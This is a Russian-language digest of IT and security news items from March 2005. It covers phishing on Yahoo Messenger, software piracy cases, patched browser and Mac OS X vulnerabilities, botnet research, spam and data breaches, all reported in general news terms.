Интернет-служба Yahoo Messenger стала целью атак фишеров (мошенников), пытающихся украсть пароли доступа и другую персональную информацию о пользователях. В четверг Yahoo подтвердила, что злоумышленниками была предпринята попытка обмана пользователей Yahoo Messenger. По сообщению компании, фишеры разослали пользователям сообщение со ссылкой на поддельный вебсайт, имитирующий официальный сайт Yahoo. Расчет фишеров был на то, что пользователь не заметит подделки, и введет свои реальные логин и пароль, тем самым, сообщив их фишерам. Убедительности, фальшивому сообщению, придавало то, что адрес отправителя, фишеры заменяли, на любой адрес из контактного листа пользователя. Если подделка срабатывала, то фишеры получали полный доступ к информации пользователя, указанной в его профайле, и к его контактному листу. В течение прошлого месяца, службу Microsoft MSN Messenger атаковали несколько раз, различными способами, включая использование вирусов и "троянских коней". В конце февраля, Microsoft обновила миллионы клиентских приложений службы MSN Messenger, чтобы остановить одного из червей, распространяющегося по ее сети.
CNews

26/03/2005 11:52 Фрадков посчитает поголовье пиратов
Российское правительство собирается установить точные объемы производства контрафактной аудио- и видеопродукции к октябрю 2005 года. Соответствующее поручение правительству дал премьер-министр Михаил Фрадков в ходе прошедшего на днях заседания правительственной комиссии по защите прав интеллектуальной собственности. Между тем, усиление мер по борьбе с контрафактной продукцией в России, похоже, связано с давлением США: недавно американские эксперты упрекнули наши власти в недостаточной жесткости по отношению к пиратам. Российский премьер недоволен качеством борьбы с аудио- и видеопиратством. По его словам, несмотря на принятие определенных мер, качественно изменить ситуацию все еще не удается, и нелегальная продукция продолжает преобладать на рынке над лицензируемой, сообщают «Вести». По мнению г-на Фрадкова, вопрос защиты прав интеллектуальной собственности в сфере аудио- и видеоиндустрии затрагивает интересы миллионов граждан. «Большие деньги и прибыли у пиратов — это те средства, которые украдены у страны. Но, работая над методами борьбы с пиратством в сфере аудио- видеоиндустрии, необходимо обращать внимание не только на пополнение бюджета, но и на наведение порядка на рынке, приведение ситуации в соответствие с требованиями, которые выдвигаются в рамках присоединения к ВТО». При этом, по словам г-на Фрадкова, правительство не представляет, каковы объемы контрафактной продукции в стране, какова география производства, сколько денег украдено у авторов и сколько налогов недоплачено. В течение полугода на основе тендера будет определен федеральный орган исполнительной власти, ответственный за проведение такого мониторинга, и к октябрю реальная ситуация на рынке аудио- и видеопродукции должна быть ясной.
Подробности

26/03/2005 11:09 Microsoft делится подробностями о сетевых технологиях Longhorn
Корпорация Microsoft поделилась некоторой информацией относительно сетевых возможностей будущей операционной системы Windows под кодовым названием Longhorn. Ожидается, что в Longhorn появится поддержка стандарта безопасности для беспроводных локальных сетей IEEE 802.11i. Он включает в себя службы аутенфикации, создания новых ключей для каждой сессии, управления ключами, проверки подлинности пакетов и пр. В новой версии Windows разработчики также намерены реализовать протокол IPv6, который должен придти на смену современному протоколу IPv4. Протокол IPv6 обратно совместим с IPv4, поддерживает 128-разрядное адресное пространство и упрощенную структуру IP-пакетов. Кроме того, у Longhorn появятся расширенные средства диагностики и устранения неполадок, связанных с работой сетевых служб. Наконец, Microsoft планирует упростить процесс организации домашних сетей для передачи мультимедийного контента от компьютера к бытовым устройствам и наоборот. Об этом сообщает Information Week со ссылкой на заявления Джвада Хаки, вице-президента подразделения корпорации Microsoft, ответственного за развитие сетевых технологий. В ближайшее время должна быть завершена разработка всех основных компонентов новой программной платформы, а в конце мая увидит свет первая бета-версия Longhorn. "Нулевой" релиз-кандидат Longhorn должен появиться в конце февраля 2006 года. Презентация финальной версии новой операционной системы запланирована на начало лета следующего года.
Подробности

26/03/2005 10:48 Цены на инструменты Microsoft неприятно удивили разработчиков
Планируемые изменения цен на инструменты программирования Microsoft возмутили некоторых заказчиков — они жалуются, что софтверный гигант обирает малые компании и независимых программистов. В понедельник Microsoft обнародовала подробности о разных редакциях своего инструмента разработки Visual Studio 2005, который предполагается выпустить во втором полугодии. Одновременно с обновлением ПО компания пересматривает схемы подписки на службу Microsoft Developer Network (MSDN), через которую программисты получают регулярные обновления и поддержку продукта. По словам руководителей Microsoft, внесенные изменения должны упростить выбор между разными редакциями Visual Studio и облегчить доступ к MSDN для небольших компаний. Однако некоторые разработчики из мелких консалтинговых фирм или независимых производителей ПО говорят, что новая подписка получается слишком дорогой, особенно если покупаешь Visual Studio Team System. Visual Studio Team System — это первый опыт Microsoft в области инструментов управления жизненным циклом приложений — комплекс продуктов, предназначенных для разных этапов процесса разработки. «Для успеха платформы Team Development важно, чтобы у мелких организаций, таких как наша, был доступ к продуктам за пропорционально меньшую плату. Успех инструментов разработки Microsoft строился на спинах независимых разработчиков вроде нас, которые заразили своей эффективностью крупные предприятия», — пишет один из заказчиков Microsoft в форуме на MSDN, где заказчики требуют изменить условия лицензирования.
Подробнее

25/03/2005 15:40 ICANN официально одобрила создание домена .eu
Международная организация ICANN ("Корпорация по распределению номеров и имен в Интернете"), регулирующая стандарты доменных имен и IP-адресов, официально одобрила создание нового домена верхнего уровня .eu, предназначенного для сайтов стран Евросоюза. Президент ICANN, один из "отцов" Интернета Винтон Серф (Vinton Cerf), подписал договор с консорциумом Eurid, который был создан для управления создаваемым доменом и получил на это одобрение Еврокомиссии. Переговоры Eurid и ICANN длились с октября 2004 года. При этом о том, по какой причине они длились так долго, не сообщается, отмечает интернет-издание ZDNet France. В настоящее время Eurid разрабатывает процедуры регистрации и политику будущего управления доменом, а также готовится принимать предварительные заявки. В третьем квартале этого года начнется период первичного приема заявок от правительственных учреждений и владельцев торговых марок. Предполагается, что в начале 2006 года начнется прием заявок от остальных желающих и фактическая работа домена.
Подробности

25/03/2005 14:38 В Пятигорске осужден системный администратор
Суд города Пятигорска Ставропольского края вынес приговор в отношении 23-летнего системного администратора одной из коммерческих компаний края, который обвиняется в нарушении авторских прав. Как сообщает агентство "Регнум", администратор признан виновным по статье 146 УК РФ ("нарушение авторских и смежных прав") за то, что в июле 2004 незаконно установил на компьютеры фирмы семь нелицензионных программ, права на которые принадлежат российскому производителю "1С". Ущерб владельцу авторских прав оценен в более, чем 300 тысяч рублей. Подсудимый приговорен к трем годам лишения свободы условно с испытательным сроком на два года и выплате штрафа в размере 10 тысяч рублей. Штраф поступит в доход государства. Отмечается, что обвинительный приговор по подобному делу в Ставропольском крае вынесен впервые. Это не первое подобное дело, рассмотренное региональными судами за последнее время. Так, накануне Арбитражный суд Чувашской Республики вынес обвинительный приговор ОАО "Чебоксарский строитель", на компьютерах которого были обнаружены нелицензионные копии операционной системы Windows, права на которую принадлежат компании Microsoft. Суд обязал ОАО выплатить денежную компенсацию в размере 430 тысяч рублей в пользу Microsoft, а также оплатить госпошлину.
Источник

24/03/2005 20:24 Apple латает 9 уязвимостей в Mac OS X
Apple в недавно выпущенном обновлении в Mac OS X латает 9 уязвимостей в своей операционной системе. Уязвимости касаются следующих компонентов и составных частей ОС: Cyrus IMAP Server (ранее была обнаружена и устранена в многих UNIX-like ОС), браузер Safari (уязвимость в обработке системе международных доменных имён - IDN), AFP Server, Bluetooth Setup Assistant Cyrus SASL, Mailman и др. Как сказал представитель Apple последствия уязвимостей различны: раскрытыие важной системной информации, повышение локальных привилегий, DoS.
Подробности

24/03/2005 20:06 Множественные уязвимости в продуктах семейства Mozilla
Французская группа K-OTiK Security сообщает о наличии 3-х уязвимостей в семействе популярных продуктов семейства Mozilla - речь идёт о: Mozilla Firefox, Mozilla Suite и Mozilla Thunderbird. Первая уязвимость связана с ошибкой перезапуска кучи (heap overrun) при обработке специфического Netscape-ориентированного блока в GIF-изображениях и позволяет выполнить произвольную команду при обработке Вэб-страницы или почтового сообщения, содержащего специальным образом сформированного изображения. Вторая уязвимость связана возникает, если пользователь помещает в закладки (bookmark) специальным образом сформированную страницу, как Firefox sidebar panel. Ну и третья уязвимость связана с некорректной обработкой специальным образом сформированного XUL-файла и позволяет обойти ограничения безопасности при открытии привилегированного XUL. Необходимо отметить, что указанные уязвимости устранены в выпущенных недавно версиях Mozilla Firefox 1.0.2, Mozilla Suite 1.7.6 и Mozilla Thunderbird 1.0.2.
Подробности

24/03/2005 11:55 Изменения в планах релизов Mandrake Linux
Французский производитель ОС Linux представил план выпуска продуктов на ближайшее будущее. Данный шаг был предпринят в свете недавнего приобретения бразильской компании Conectiva.
Mandrakesoft продолжает плавное движение в сторону переименования названия дистрибутивов. По заявлениям представителей компании, планируется ежегодный выпуск обновленного дистрибутива, в связи с чем, будущие названия будут базироваться на дате выхода продукта. Кроме того, это упростит работу с партнерами, агентами по продаже и клиентами. Изменения, которые войдут в релиз 2006, представят в конце 2005 года. Многое, по словам разработчиков, будет заимствовано из разработок компании Conectiva (в частности, изменения коснутся web-сервисов). Однако полному переходу будет предшествовать переходный выпуск ОС. Запланированный на эту весну «Limited Edition 2005» будет базироваться на текущей ветви разработки Mandrakelinux и заменит собой Mandrakelinux 10.2. Этот релиз не будет включать в себя множество обновлений открытых программ, таких как KDE, GNOME и Firefox.
Источник

24/03/2005 11:49 Многозадачная виртуальная машина
На сайте SUN появилась интересная статья о новой разработке в Java 1.5, а именно "многозадачная" виртуальная машина, сообщает linux.org.ru. Суть в том, чтобы изолировать множественные приложения в рамках одной JVM вместо запуска нескольких виртуальных машин. Это дает более быстрый старт и общую производительность. Если проект будет реализован и будет обладать теми характеристиками, как заявляет фирма - это может составить довольно серьёзную конкуренцию продивгаемой Microsoft технологии .NET.
Статья

24/03/2005 11:09 Symantec выявила мотивы хакеров и вирусописателей
Более половины недавних существенных интернет-угроз были связаны с попытками получения персональной информации о пользователях. Этот факт свидетельствует о том, что главным мотивом киберпреступников была кража денег, сообщает сайт News.com со ссылкой на исследование компании Symantec. C попытками сбора персональной информации связано 54 процента крупнейших вирусных инцидентов, зафиксированных с июля по декабрь прошлого года. В аналогичный период 2003 года этот показатель составил 36 процентов. Компьютеры постоянно подвергаются все большему числу атак разными видами вредоносных программ, которые собирают кэшированные сведения о пользователях онлайновых финансовых служб. Эта тенденция ничуть не ослабевает, отмечают авторы исследования. В отчете отмечен и рост фишинг-активности, которая в основном полагается на так называемую «социальную инженерию». По данным Symantec, в декабре с помощью ее программ еженедельно блокировалось более 33 миллионов фишинг-атак. В середине июля этот показатель находился на уровне 9 миллионов. В качестве средств борьбы с хищениями персональной информации в интернете некоторые эксперты предлагают введение проверки подлинности электронных писем и специальных правил их отправления. Авторы доклада считают эту меру нерезультативной, поскольку киберпреступники никакие правила соблюдать не будут.
VirusList

24/03/2005 11:07 Опубликована новая редакция ФЗ «Об информации…»
Старший научный сотрудник Сектора информационного права Института государства и права Российской академии наук, кандидат юридических наук Станислав Петровский подготовил проект новой редакции Федерального закона от 20 февраля 1995 года № 24-ФЗ «Об информации, информатизации и защите информации». Текст законопроекта представлен автором в Российский комитет Программы ЮНЕСКО «Информация для всех» для экспертного обсуждения. Вниманию заинтересованных лиц предлагается полный текст законопроекта и выдержки из Пояснительной записки к нему. Как сообщает «Информация для всех», проект был подготовлен в связи с необходимостью гармонизации положений Федерального закона «Об информации, информатизации и защите информации» с действующим гражданским и иным законодательством Российской Федерации, а также нормами международного права.
Подробности

24/03/2005 10:25 В Firefox устранены очередные уязвимости
Сообщество Mozilla.org объявило о выпуске очередной модификации браузера Firefox, получившей индекс 1.0.2. В Firefox 1.0.2 устранены несколько уязвимостей, в том числе одна дыра, охарактеризованная как критически опасная. Данная брешь была обнаружена сотрудниками компании Internet Security Systems (ISS) и связана с некорректной обработкой графических файлов в формате GIF. При попытке просмотра в Firefox сформированного особым образом GIF-изображения на компьютере возникает ошибка переполнения буфера, после чего злоумышленник может выполнить в системе любой вредоносный код. Кроме того, в новой модификации Firefox была устранена достаточно опасная дыра, связанная с обработкой закладок. Примечательно, что версия Firefox 1.0.2 появилась ровно через месяц после выхода браузера Firefox 1.0.1, основные изменения в котором также были связаны с проблемами безопасности. В настоящее время количество загрузок браузера Firefox приближается к 30 миллионам. Рыночная доля этого программного продукта, по оценкам голландской компании OneStat, составляет около 8,5%. Для сравнения, браузеру Microsoft Internet Explorer отдают предпочтение свыше 87% пользователей интернета.
Анонс

24/03/2005 10:02 Леонид Рейман против законодательного запрета спама
Министр информационных технологий и связи РФ Леонид Рейман выступает против введения жесткого запрета на рассылку рекламы по электронной почте. "Не совсем правильно вводить жесткие запретительные меры, которые отрезали бы рассылку рекламной информации", - сказал министр во вторник, выступая на заседании президиума Российской академии наук. По его мнению, для борьбы со спамом можно распространять специальные недорогие программы, которые позволят ограничить поступление ненужной информации. В своем выступлении Рейман также высказался за повышение доступности инфокоммуникационных технологий для населения. Для этого, по его мнению, необходимо стимулировать снижение цен на рынке, расширять возможности потребительского кредитования для приобретения компьютеров, а также создавать общедоступные компьютерные центры в регионах. Кроме того, необходимо активизировать выполнение программы подключения к интернету образовательных учреждений. Рейман высказался и за то, чтобы начать работу по внедрению инфокоммуникационных технологий в органах местного самоуправления. Глава Мининформсвязи напомнил, что с 1 января 2006 года вступает в силу закон об общих принципах организации местного самоуправления, сообщает РИА "Новости".
РИА "Новости"

24/03/2005 09:31 Невежество британских пользователей ПК привело к эпидемии зомбирования
Большинство зомбированных персональных компьютеров, которые находятся под контролем вирусов, находится в Великобритании. Как сообщает BBC News, такие данные приводятся в исследовании фирмы Symanteс, специализирующейся в области компьютерной безопасности. На британских пользователей ПК приходится 25,2 процента зараженных компьютеров от их общемирового количества. Еще 24,6 процента случаев зарегистрировано в США. На третьем месте - Китай с 7,8 процента. По мнению специалистов компании, к резкому росту числа зомбированных компьютеров в Британии привело двукратное увеличение за последний год количества ПК, имеющих подключение к широкополосным сетям передачи данных. Кроме того, значительную роль сыграло невежество пользователей и их пренебрежение мерами безопасности. Эксперты отмечают, что люди, получившие расширенные возможности передачи информации, зачастую не осознают необходимости принимать дополнительные меры предосторожности. В результате их компьютеры используются хакерами для рассылки спама, нападений на сайты и для похищения персональных данных.
Более подробно

24/03/2005 09:27 В "неуязвимой" Mac OS найдено 37 серьезных "дыр"
Операционная система Apple Mac OS X, которую ее пользователи считали практически неуязвимой, всё чаще становится объектом взломов и хакерских атак. Об этом говорится в бюллетене Internet Security Threat Report, опубликованном корпорацией Symantec. Согласно этому документу, с июля по декабрь 2004 года специалисты Symantec обнаружили 37 серьёзных уязвимостей в Mac OS X. Они позволяют взломщикам получить доступ к информации, размещенной на компьютере, обходить идентификационную защиту, удалённо запускать любой код и организовывать DoS-атаки. Ранее Mac OS X считалась защищенной системой, и покупатели компьютеров Apple не уделяли должного внимания вопросам безопасности, отмечается в бюллетене. Однако по мере того, как рыночная доля компьютеров Apple постепенно увеличивается (в настоящее время она составляет менее пяти процентов), хакеры всё чаще будут обращают внимание на Mac OS X со всеми её уязвимостями. При этом специалисты, занимающихся вопросами компьютерной безопасности, отмечают, что абсолютно защищенных систем не существует.
Lenta.Ru

24/03/2005 09:25 Microsoft тестирует новую программу автоматической загрузки обновлений
Microsoft обкатывает универсальную программу обновления ПО, которая поможет пользователям Windows XP, Windows 2000 и Windows Server 2003 управлять поправками для ОС и приложений. Во вторник Microsoft приступила к тестированию службы Microsoft Update, которая, как утверждает компания, поможет пользователям своевременно устанавливать последние обновления для Windows, Office и других программ. Бесплатная программа, окончательная версия которой должна выйти в этом году, позволяет пользователям Windows XP, Windows 2000 и Windows Server 2003 либо загружать все обновления автоматически, либо выбирать их вручную. В феврале, выступая на мероприятии RSA Conference 2005, председатель правления Microsoft Билл Гейтс пообещал, что бета-версия программы появится в марте. В своей современной форме Microsoft Update, кроме патчей для Windows и Office, скачивает обновления для СУБД SQL Server и ПО электронной почты и календаря Exchange. В будущем Microsoft планирует добавить поддержку для других программ.
Подробности

23/03/2005 19:47 IBM предлагает оружие нападения против спама
IBM разработала новое средство от спама — технологию сортировки сообщений e-mail, которая анализирует домен источника, а затем замедляет работу компьютеров, ответственных за рассылку непрошеных сообщений. Представленная во вторник антиспамерская технология заключается в активном противодействии компьютерам, используемым для рассылки больших объемов спама. Программа, называемая FairUCE, определяет, какие именно машины являются источником спама, и возвращает отправителю все его сообщения, замедляя работу компьютера и затрудняя ему отправку новой почты. Теоретически, чем больше спама генерирует система, тем больший трафик будет возвращаться к ней от FairUCE. IBM предлагает этот инструмент для бесплатной загрузки на своем веб-сайте. По данным исследования, проведенного IBM, 76% всей электронной почты, отправленной в феврале, были спамом, и одно из 46 сообщений блокировалось из-за содержащегося в нем вируса или другого злоумышленного контента. Однако эти цифры, хотя они и высоки, указывают на снижение уровня спама по сравнению с январем, когда спам составлял 83% от всех сообщений e-mail. Технология фильтра, лежащая в основе FairUCE, для установления легитимности сообщений e-mail использует инструменты управления идентификационными данными на сетевом уровне, прослеживая путь к источнику спама. Определив IP-адрес компьютера, система воссоздает профиль машины, рассылающей спам, и начинает возвращать сообщения, подавляя эту точку.
Подробнее о технологии

23/03/2005 19:14 Житель Москвы украл полтора миллиона виртуальных долларов
Следственный комитет при МВД РФ возбудил уголовное дело в отношении жителя Москвы, который подозревается в совершении мошенничества с помощью карт экспресс-оплаты платежной интернет-системы Webmoney, сообщает РИА "Новости" со ссылкой на пресс-службу комитета. Как рассказал сотрудник пресс-службы, в ходе расследования было установлено, что подозреваемый, имя которого не называется, "незаконно завладел" кодами активации предоплаченных карт этой системы и пытался пополнить с их помощью свой электронный платежный счет. "Своими действиями москвич, в отношении которого возбуждено дело, причинил ущерб в сумме свыше 200 тысяч рублей ООО "Гарантийное Агентство", которое эмитировало выпуск карт экспресс-оплаты", - отметили в пресс-службе. Источник агентства добавил, что в ходе обыска, который был проведен дома у подозреваемого, сотрудники МВД обнаружили 87 листов формата А4 с распечатками похищенных кодов активации карт. Они соответствовали картам номиналом в 50 и 100 принятых в системе условных единиц. Общая сумма составляла около 1,5 миллионов условных единиц, что по курсу системы (для валюты WMZ) соответствует 1,5 миллионам долларов. Каким именно образом он получил эти коды, неизвестно. В отношении мошенника ведется предварительное расследование.
РИА "Новости"

23/03/2005 18:11 Хакеры похитили сведения о 59 тысячах работников и студентов Калифорнийского университета
Сервер Калифорнийского государственного университета был атакован неизвестными хакерами, которые похитили оттуда информацию о 59 тысячах сотрудников и студентов этого вуза, cообщает Lenta.Ru. Как сообщает Reuters, администрация университета выступила с заявлением, в котором рассказала об обнаруженной утечке и предупредила, что дальнейшая судьба информации неизвестна. Среди похищенных данных различные сведения личного характера, в том числе номера социального страхования. Подобная информация может быть использована злоумышленниками, например, для совершения фиктивных операций различного рода от чужого имени. Это третий подобный случай за последние полтора месяца. В начале марта была обнародована информация о краже хакерами данных о 32 тысячах американцев, которые хранились в базе консалтинговой компании Seisint, а в середине февраля стало известно об организованной хакерской атаке против калифорнийского отделения юридической фирмы ChoicePoint, в результате которой были похищены данные о 145 тысячах жителей Калифорнии и других штатов.
Подробности

18/03/2005 12:15 В Украине впервые могут посадить спамера
Правоохранители Донецкой области ведут расследование массового распространения "спама" в регионе. Отметим, что это первое уголовное дело в Украине о вмешательстве в работу компьютерной сети путем массового распространения сообщений электросвязи, сообщает Медиа-Объектив. В Управление по борьбе с экономической преступностью УМВД Донецкой области обратился представитель одного из Интернет-провайдеров с информацией о том, что электронные сообщения от неизвестного лица блокируют работу его сети. Правоохранителям удалось установить, кто рассылал огромное количество "спама". Если подозреваемого в рассылке признают виновным, его ждет штраф в размере от 500 до 1000 необлагаемых налогом минимумов доходов или лишение свободы на срок до трех лет. Напомним, что в этом году вступили в силу изменения в Уголовный и Уголовно-процессуальный кодекс Украины, согласно которым за препятствование работе компьютеров, автоматизированных систем, компьютерных сетей и сетей электросвязи путем массового распространения сообщений предусмотрена уголовная ответственность.
SecurityLab

18/03/2005 11:27 В Германии действует проект по отслеживанию "хакерских сетей"
Создатель и оператор немецкого проекта German Honeynet Project Торстен Хольц опубликовал первые результаты работы проекта "Знай врага в лицо: отслеживание бот-сетей" (Know Your Enemy: Tracking Botnets). Под "бот-сетями" или "зомби-сетями" подразумеваются "сети", состоящие из "компьютеров-зомби", заражённых (в результате вирусной атаки или прямого вторжения хакера) т.н. "ботами", зловредными программами, которыми хакер может управлять удалённо, например, с помощью IRC-чата. Основой German Honeynet Project является сеть из, казалось бы, минимально защищённых компьютеров-ловушек (honeypots, оттуда и название honeynet), которые подвергаются заражениям со стороны хакеров, а потом регистрируют всю деятельность ботов. С помощью пожертвованных компьютеров Хольц и его коллеги отслеживают деятельность хакеров - владельцев "бот-сетей". Фальшивые "зомби-компьютеры" Хольца позволили ему наблюдать работу более чем сотни различных бот-сетей, в некоторые из которых входило до 50 тысяч заражённых компьютеров (настоящих "зомби", владельцы которых, вероятно, даже и не подозревали о том, что они заражены). Обнаружилось и несколько довольно интересных обстоятельств. Во-первых, выявлено наличие нескольких малых бот-сетей, находящихся под контролем одних и тех же лиц (Хольц предполагает, что это попытка сделать бот-сети менее уязвимыми, распределяя контроль над ними на несколько серверов). Во-вторых, как выяснилось, операторы бот-сетей активно и воюют, и торгуют друг с другом, причём в качестве товара выступают целые сети. Ну, и в-третьих, оказалось, что далеко не все эти "хакеры" обладают высоким уровнем технической грамотности, иначе бы они не задавали друг другу вопросов на тему: "А как мне откомпилировать то-то и то-то".
Подробности

18/03/2005 11:05 Спамеры возродили искусство рисования символами ASCII
Эксперты SophosLabs, глобальной сети аналитических центров по защите от вирусов и спама компании Sophos, определили, что некоторые спамеры используют давно забытую технологию псевдографики для того, чтобы их сообщения проскочили сквозь фильтры антиспамовых программ. На заре развития компьютерных технологий, когда мониторы не могли отображать графику, а отображали только текст, пользователи компьютеров создавали псевдографические изображения, тщательно размещая текстовые символы. Для отображения большинства ASCII-изображений необходимо использование шрифтов постоянной ширины (таких как, например, на печатных машинках). Любители ASCII-изображений до сих пор обмениваются своими творениями с другими пользователями через интернет. Однако в стандартной электронной переписке подобная псевдографика практически не используется, так как в наши дни можно просто присоединять к электронному письму графические файлы. Исследователи компании Sophos обнаружили, что некоторые спамеры используют псевдографику в своих письмах для рекламы товаров. Одним из последних примеров может послужить электронное письмо, в котором посредством ASCII спамеры рекламируют различные лекарственные препараты.
Источник

18/03/2005 10:52 Хакеры пытались увести из банка $423 млн.
Как сообщает ВВС, лондонская полиция предотвратила ограбление банка, которое могло стать одним из крупнейших в истории Великобритании. Злоумышленники намеревались похитить 220 млн. фунтов стерлингов ($423 млн.) из лондонского отделения японского банка Sumitomo. Власти полагают, что компьютерные эксперты пытались проникнуть в компьютерную систему банка и перевести деньги электронным способом. Заговор был раскрыт отделением британской полиции, занимающимся преступлениями в области высоких технологий, после чего в Израиле был арестован один из подозреваемых, который пытался перевести 13,9 млн. фунтов стерлингов на счет, открытый в этой стране. Ему предъявлены обвинения в отмывании средств и мошенничестве, однако полиция утверждает, что расследование еще не окончено. Оно началось в октябре прошлого года, когда выяснилось, что компьютерная система лондонского офиса Sumitomo взломана. Хакерам удалось проникнуть в систему с помощью специального программного обеспечения, отслеживающего каждое нажатие клавиши в отделении банка. Таким образом злоумышленники могли получить доступ к номерам счетов, паролям и другой секретной информации.
CNews

18/03/2005 10:10 Министр связи призвал ужесточить наказание за интернет-преступления
Министр информационных технологий и связи РФ Леонид Рейман в четверг заявил, что государство должно ужесточить наказание за распространение противоправной информации в Интернете. Как передает РИА "Новости", свое мнение он высказал, выступая на международной конференции "Религия и церковь в информационном обществе". "Государство должно решать эту проблему ужесточением наказания за противоправные действия в сети", - заявил министр, отметив, что сейчас в сети гражданское право практически не действует. В то же время Рейман вновь высказался против государственного регулирования российского сегмента Сети. "Я всегда выступал против регулирования Интернета. К сожалению, опыт других стран показывает, что попытки регулирования ни до чего хорошего не довели", - сказал министр. Однако, по его словам, государство обязано позаботиться о духовном здоровье граждан, в первую очередь, детей. "Государство должно противодействовать распространению в сети негативных проявлений, в том числе пропаганды насилия, порнографии, вредоносных программ", - сказал Рейман.
РИА "Новости"

18/03/2005 09:46 Релиз Thunderbird 1.0.1 отменен, вместо этого выйдут Firefox 1.0.2 и Thunderbird 1.0.2
Как сообщает linux.org.ru, планировавшииеся к выпуску версии Thunderbird 1.0.1 и Mozilla 1.7.6, которые содержали баг-фиксы из Firefox 1.0.1 были задержаны из-за вновь обнаруженных уязвимостей. Теперь решено выпустить все три версии Firefox 1.0.2, Thunderbird 1.0.2 и Mozilla 1.7.6 только после исправления новых уязвимостей. Релиз-кандидаты Firefox 1.0.2 и Thunderbird 1.0.2 будут выложены в ближайшее время.
Подробности

18/03/2005 09:21 Бот-сети опираются на Windows
Несмотря на взятый Microsoft курс на повышение безопасности, недавнее исследование показывает, что подавляющее большинство компьютеров, образующих бот-сети, это машины Windows XP и 2000. Исследование, выполненное немецкой организацией Honeynet Project, обнаружило, что свыше 80% веб-трафика, источником которого служат сети из взломанных компьютеров, проходит через четыре порта, предназначенных для обмена ресурсами между разными версиями Windows. Оно показало также, что уязвимости, которые некоторые эксплойты используют для взлома ПК, можно обнаружить методом поиска информации в секьюрити-бюллетенях Microsoft. «Большая часть активности на этих портах, безусловно, вызвана системами с Windows XP (часто с установленным Service Pack 1), а на втором месте стоят системы Windows 2000. За ними с большим отставанием следуют системы Windows 2003 или Windows 95/98», — говорится в отчете Honeynet Project. Microsoft ответила на это, в очередной раз повторив, что она стремится обеспечить безопасность платформ перед лицом атак со стороны бот-сетей, за которыми часто стоят преступные группы. «Создание ИТ-угроз и кража данных является уголовным преступлением, которое затрагивает всех. Этот тип преступной деятельности обычно имеет финансовую мотивацию, и преступники часто нацеливаются на платформу Microsoft и ее приложения ввиду обширной клиентской базы, — говорится в заявлении компании. — Однако это серьезная проблема для всей отрасли, и ни одна организация не застрахована от данной угрозы». Наиболее интенсивно эксплуатируемыми портами Windows, согласно исследованию, являются порты 445/TCP (используется для обмена файлами); 139/TCP (используется для подключения к машине с целью обмена файлами); 137/UDP (используется для поиска информации на других компьютерах) и 135/TCP (используется для дистанционного исполнения кода). Бот-сети обычно применяются для атак на отказ в обслуживании (denial-of-service), когда целевой компьютер перегружается данными и перестает работать. Кроме этого, они применяются для распространения спама, шпионского ПО, манипуляции онлайновыми опросами и массовой кражи идентификационных данных.
Lenta.Ru

18/03/2005 09:07 Шведская полиция захватила "самый большой пиратский сервер Европы"
Шведская полиция провела в Стокгольме масштабный рейд в офисах крупнейшего провайдера страны Bahnhof, сообщает Reuters. Операция проводилась по запросу правоохранительных органов США, которые полагают, что на мощностях провайдера в течение многих лет размещались пиратские ресурсы, содержащие контрафактную медиапродукцию, в том числе американского производства. Расследование в отношнии шведского провайдера было начато по инициативе MPAA - Американской ассоциации кинопроизводителей, которая, как известно, наравне с другими объединениями правообладателей участвует в кампании против пиратства во всем мире. По словам представителей шведской полиции, в результате операции были получены доказательства того, что провайдер оказывал телекоммуникационные услуги производителям контрафактной продукции со всей Европы. Они, как утверждается, организовали на мощностях Bahnhof пиратские ресурсы, среди которых - "самый большой пиратский сервер Европы" (его название не уточняется). Под арестом оказались четыре сервера, на которых размещались фильмы "общей протяженностью 3,5 года".
Подробности

16/03/2005 14:37 Netcraft: Популярность Fedora растет, Red Hat — падает
оследняя статистика рынка web-серверов свидетельствует о том, что Fedora Core — поддерживаемый сообществом бесплатный дистрибутив Red Hat Linux — набирает популярность. По опубликованным компанией Netcraft в понедельник данным об используемости Linux для управления web-серверами, рост популярности Fedora Core с сентября 2004 года составил 122 процента — в марте под управлением бесплатной Red Hat работало 400 тысяч из 4 миллионов проанализированных web-сайтов. Число серверов с Red Hat Enterprise Linux, напротив, уменьшилось на 20.000, однако превысило отметку в 1,61 миллиона. Колин Фиппс (Colin Phipps), разработчик из Netcraft, объясняет продолжающееся падение популярности RHEL (Red Hat Enterprise Linux) сменой лицензионной модели Red Hat: еще в 2003 году компания повысила стоимость коммерческих предложений, одновременно запустив Fedora — проект по созданию бесплатного Linux-дистрибутива.
Nixp.Ru

16/03/2005 13:44 "Евросеть" обвинили в краже мобильного русификатора
Компания Paragon Software Group, российский разработчик системных утилит и программного обеспечения для мобильных устройств, обвинил дилерскую сеть «Евросеть» в пиратстве. Представители Paragon заявляют, что «Евросеть» незаконно использует разработанный компанией русификатор LEngSmart на продаваемом в магазинах сети смартфоне Motorola Mpx200. В «Евросети» обвинение отвергают, а представители других дилеров склонны винить в происходящем производителя, который поторопился выпустить на рынок нерусифицированную версию смартфона. Как говорится в сообщении компании Paragon, «мы располагаем документально подтвержденной информацией, свидетельствующей о том, что „Евросеть“ занимается незаконным распространением полной коммерческой версии системы русификации LEngSmart, используемой в качестве предустановленного программного обеспечения вместе со смартфонами модели Motorola MPx 200, без необходимого соглашения с разработчиком». Впрочем, компанию больше всего беспокоит тот факт, что «подобные действия дискредитирует не только компанию „Евросеть“, но и производителя, так как Paragon не имеет возможности оказывать техническую поддержку своей продукции, распространяемой незаконными путями». Поэтому Paragon «сделал руководству „Евросети“ предложение о приобретении за €1 (символическую цену) безлимитной многопользовательской лицензии на полную коммерческую версию системы русификации LengSmart для Motorola Mpx200». В «Евросети» же заявляют, что никогда не имели дела с продуктами производства Paragon. «Мы продаем данную модель смартфона с предустановленным русификатором совершенно другой российской компании — „Кварта“, и с ней у нас заключен соответствующий договор, — сообщила пресс-секретарь „Евросети“ Татьяна Гуляева. — „Кварта“ — это авторизированный партнер Microsoft (производителя операционной системы для Mpx200), которого нам рекомендовали в самой Motorola». По словам г-жи Гуляевой, «„Евросеть“ никогда не использовала программное обеспечение от Paragon, а представители данной компании даже не обращались к нам со своими претензиями».
Более подробно

16/03/2005 13:31 Более половины корпораций беззащитны перед внутренними угрозами
